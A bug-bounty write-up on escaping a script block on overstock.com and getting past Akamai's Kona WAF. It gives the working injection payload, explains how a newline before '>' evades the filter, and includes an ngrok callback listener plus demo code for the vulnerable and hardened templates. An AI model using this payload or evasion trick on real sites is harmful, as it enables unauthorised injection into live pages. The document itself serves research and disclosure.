How I bypassed the AKAMAI KONA WAF: XSS in overstock.com!
This target is in a Bugcrowd program. I picked it for my research on XSS (cross-site scripting), mainly to learn how a WAF works and where it fails.
I found the endpoint with a Google dork (use your brain) and ended up with this vulnerable URL:
The target is protected with:
AKAMAI KONA WAF + XSS HEADER PROTECTION
First I check where our input is reflected, using view-source:
We can see "crot" reflected inside what looks like a JavaScript array or object literal in a <script> block (I don't know what that array or object is for). Because the reflection is inside a script block, the first step is to get out of it: I try "</script></body>" to close the <script> and <body> tags on overstock.
Yay! Our payload escaped the script block.
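To make the break-out concrete, here is an added example (not overstock.com's page and not the author's code) with a made-up template that reflects a query parameter into a JS object inside <script>, the way the view-source above showed "crot". The HTML tokenizer ends a script block at the first "</script" it sees, regardless of JavaScript string quoting, which is why the vulnerable template can be escaped and why the hardened version must never let a raw "<" reach the script block.

```javascript
// Node.js, no dependencies. Added example: a hypothetical page template that
// reflects a query parameter into a JS object inside <script>, similar to what
// the post's view-source showed. It is not overstock.com's real page.

// Vulnerable: the parameter is pasted straight into a JS string literal.
function renderVulnerable(q) {
  return `<html><body>
<script>
  var pageState = { search: "${q}" };
</script>
</body></html>`;
}

// Hardened: JSON-encode the value and additionally escape the characters that
// the HTML tokenizer (not the JS engine) cares about. "</script>" ends a
// script block no matter which JS string it sits in, so "<" must never appear
// literally; U+2028/U+2029 are line terminators in older JS engines.
function escapeForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderSafe(q) {
  return `<html><body>
<script>
  var pageState = { search: ${escapeForScript(q)} };
</script>
</body></html>`;
}

// Where does a marker land: inside a <script> block ("script") or in HTML
// body content ("html")? Mirrors the manual view-source check in the post.
function reflectionContext(html, marker) {
  const at = html.indexOf(marker);
  if (at < 0) return 'not reflected';
  const before = html.slice(0, at).toLowerCase();
  const lastOpen = before.lastIndexOf('<script');
  const lastClose = before.lastIndexOf('</script');
  return lastOpen > lastClose ? 'script' : 'html';
}

// Number of script-closing tags the tokenizer would see: a second "</script"
// means the input broke out of the original block.
function countScriptBlocks(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// Usage: the "crot" marker lands in script context; prefixing it with the
// post's break-out string moves it into HTML context on the vulnerable page
// but not on the hardened one.
console.log(reflectionContext(renderVulnerable('crot'), 'crot'));
console.log(reflectionContext(renderVulnerable('</script></body>crot'), 'crot'));
console.log(reflectionContext(renderSafe('</script></body>crot'), 'crot'));
```

The check in `reflectionContext` is the same thing you do by eye in view-source: search for the marker, then look at which tag was opened last before it. Note that `JSON.stringify` alone is not enough for this sink, since it leaves "<" and "/" untouched; the extra `\u003c` escaping is what keeps "</script>" from being seen by the tokenizer.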
I searched for every "Akamai WAF bypass" payload I could find:
- in Twitter posts
- in GitHub posts
- on HackerOne (for example a disclosed 18F report: "This XSS was undetectable by the most XSS…")
None of those tips got past the Akamai WAF. So I started researching on my own :( The idea: instead of executing script, inject a tag that makes the victim's browser request my host (I use ngrok.io) and listen for that callback. As a first test, I used the w3schools "Try it" editor to check that an HTML body tag can pull in my host:
and I tried this payload:
My ngrok host receives a request from the w3schools page:
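The out-of-band listener used above, as an added example (not the post's own setup): a small Node.js server that you expose with ngrok, plus a helper that builds the stand-alone probe page to paste into an HTML editor. The port, the ngrok hostname and the log format are assumptions; the post only says it used ngrok.io. Each hit is logged with the request path, the Referer (which tells you which page the tag was injected into, when the browser sends it) and the User-Agent.

```javascript
// Node.js, built-in modules only. Added example; assumes ngrok is started as
// `ngrok http 8080` and the public URL is substituted into the probe.
const PORT = 8080; // assumption

// Stand-alone test page that loads OUR host through the body background
// attribute; paste into any HTML editor (the post used w3schools "Try it").
function probeHtml(callbackUrl) {
  return `<!DOCTYPE html><html><body background='${callbackUrl}'></body></html>`;
}

// One log line per hit. `now` is injectable so the format can be tested.
function formatHit({ method, url, headers = {}, remoteAddress = '-' }, now = new Date()) {
  const referer = headers.referer || headers.referrer || '-';
  const ua = headers['user-agent'] || '-';
  return `${now.toISOString()} ${remoteAddress} ${method} ${url} referer=${referer} ua="${ua}"`;
}

// 1x1 transparent GIF, so the background image load succeeds silently on the
// page it was injected into instead of producing a broken-image request loop.
const GIF = Buffer.from('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7', 'base64');

async function startListener(port = PORT) {
  const http = await import('node:http'); // dynamic import works in CJS and ESM
  const server = http.createServer((req, res) => {
    console.log(formatHit({
      method: req.method,
      url: req.url,
      headers: req.headers,
      remoteAddress: req.socket.remoteAddress,
    }));
    res.writeHead(200, { 'Content-Type': 'image/gif', 'Cache-Control': 'no-store' });
    res.end(GIF);
  });
  server.listen(port, () => console.log(`listening on :${port}`));
  return server;
}

if (typeof require !== 'undefined' && require.main === module) {
  // Hypothetical public hostname; replace with the one ngrok prints.
  console.log(probeHtml('https://dfc26b38.ngrok.io/overstock'));
  startListener();
}
```

Use a distinct path per target (here `/overstock`) so that a hit is attributable even when the Referer is stripped by a referrer policy.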
NOW TIME TO BYPASS THE AKAMAI KONA WAF ON OVERSTOCK
with my payload:
"</script></body><body%20background=%27https://dfc26b38.ngrok.io/overstock%27%0a>"
Why the "%0a" at the end of the tag? The WAF still blocked the payload when the tag ended with a plain ">", so I added a newline ("\n", URL-encoded as %0a) between the attribute value and the ">". The HTML parser treats that newline as ordinary whitespace inside a tag and still closes it, but the WAF signature no longer matches. Note that this final payload never executes JavaScript: the background attribute only makes the browser fetch a URL from my host, which is enough to prove the injection and is not what a browser's XSS filter is built to stop.
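The following added example (not the author's code, and not Akamai's rule set, which is not public) shows why a newline before ">" can make the difference: a hypothetical naive signature that expects the quoted attribute value to be immediately followed by ">" next to a minimal HTML start-tag tokenizer that, like the WHATWG tokenizer, accepts tab, LF, FF and space anywhere between attributes and before ">". Both payload variants decode to the same body tag in the browser, but only the plain one trips the naive rule. The ngrok hostname is the one in the post and is only a placeholder.

```javascript
// Node.js, no dependencies. Added example; the "rule" below is hypothetical and
// only illustrates an adjacency mistake, not the real Akamai Kona signature.
const NAIVE_BODY_BACKGROUND_RULE = /<body\s+background\s*=\s*(['"])https?:\/\/[^'"]*\1>/i;

function naiveWafBlocks(rawUrlParam) {
  const decoded = decodeURIComponent(rawUrlParam); // %20 -> space, %27 -> ', %0a -> \n
  return NAIVE_BODY_BACKGROUND_RULE.test(decoded);
}

// Minimal start-tag tokenizer for the states that matter here: after a quoted
// attribute value, whitespace (space, tab, LF, FF) moves to "before attribute
// name", and ">" emits the tag. So `...'\n>` closes the tag just like `...'>`.
function parseFirstStartTag(html, tagName) {
  const start = html.toLowerCase().indexOf('<' + tagName);
  if (start < 0) return null;
  let i = start + 1 + tagName.length;
  const isWs = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\f';
  const attrs = {};
  while (i < html.length) {
    while (i < html.length && isWs(html[i])) i++;
    if (html[i] === '>') return { name: tagName, attrs };
    let name = '';
    while (i < html.length && !isWs(html[i]) && html[i] !== '=' && html[i] !== '>') name += html[i++];
    while (i < html.length && isWs(html[i])) i++;
    let value = '';
    if (html[i] === '=') {
      i++;
      while (i < html.length && isWs(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < html.length && html[i] !== q) value += html[i++];
        i++; // skip closing quote
      } else {
        while (i < html.length && !isWs(html[i]) && html[i] !== '>') value += html[i++];
      }
    }
    attrs[name.toLowerCase()] = value;
  }
  return null; // unterminated tag
}

function evaluatePayload(rawUrlParam) {
  const decoded = decodeURIComponent(rawUrlParam);
  const tag = parseFirstStartTag(decoded, 'body');
  return {
    blockedByNaiveRule: naiveWafBlocks(rawUrlParam),
    browserSeesBodyTag: tag !== null && 'background' in tag.attrs,
    background: tag ? tag.attrs.background : null,
  };
}

// Placeholder listener URL taken from the post; substitute your own.
const HOST = 'https://dfc26b38.ngrok.io/overstock';
const PAYLOAD_BLOCKED = '</script></body><body%20background=%27' + HOST + '%27>';
const PAYLOAD_BYPASS = '</script></body><body%20background=%27' + HOST + '%27%0a>';

console.log(evaluatePayload(PAYLOAD_BLOCKED));
console.log(evaluatePayload(PAYLOAD_BYPASS));
```

The general lesson is the one the post found by trial and error: a signature that matches a fixed byte sequence such as `'>` is checking the attacker's encoding, not the parser's interpretation. Any whitespace the tokenizer tolerates (tab, form feed or a newline, as here) can be placed before ">" without changing what the browser builds.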
Response on my ngrok.io listener:
XSS SUCCESS!
Follow my twitter